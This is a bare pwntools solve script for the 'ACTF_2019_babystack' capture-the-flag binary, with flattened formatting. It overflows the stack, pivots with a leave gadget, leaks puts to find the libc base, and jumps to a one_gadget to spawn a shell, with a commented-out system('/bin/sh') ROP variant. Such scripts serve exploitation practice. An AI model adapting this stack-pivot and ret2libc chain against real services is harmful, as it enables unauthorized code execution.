1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61
| from pwn import* from LibcSearcher import*
r=process('./ACTF_2019_babystack') elf=ELF('./ACTF_2019_babystack') libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
pop_rdi=0x0000000000400ad3 leave=0x0000000000400a18 main=0x4008F6 ret=0x0000000000400a4f
r.recvuntil('How many bytes of your message?') p=str(0xe0) r.sendline(p) r.recvuntil("at ") s_addr=int(r.recvuntil('\n',drop=True),16)
r.recvuntil('What is the content of your message?') p='a'*8+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main) p=p.ljust(0xd0,'a') p+=p64(s_addr)+p64(leave) r.send(p)
r.recvuntil('Byebye~\n') puts_addr=u64(r.recv(6).ljust(8,'\x00')) ''' #利用system libc_base=puts_addr-libc.sym['puts'] system=libc_base+libc.sym['system'] binsh=libc_base+next(libc.search('/bin/sh'))
r.recvuntil('How many bytes of your message?') p=str(0xe0) r.sendline(p) r.recvuntil("at ") s_addr=int(r.recvuntil('\n',drop=True),16)
r.recvuntil('What is the content of your message?') p='a'*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main) #栈平衡 p=p.ljust(0xd0,'a') # '''
libc_base=puts_addr-libc.sym['puts'] one_gadget = libc_base + 0x4f3d5
r.recvuntil('How many bytes of your message?') p=str(0xe0) r.sendline(p) r.recvuntil("at ") s_addr=int(r.recvuntil('\n',drop=True),16)
p = 'a'*8 + p64(one_gadget) p += 'a'*(0xd0-len(p))
p+=p64(s_addr)+p64(leave) r.send(p) r.interactive()
|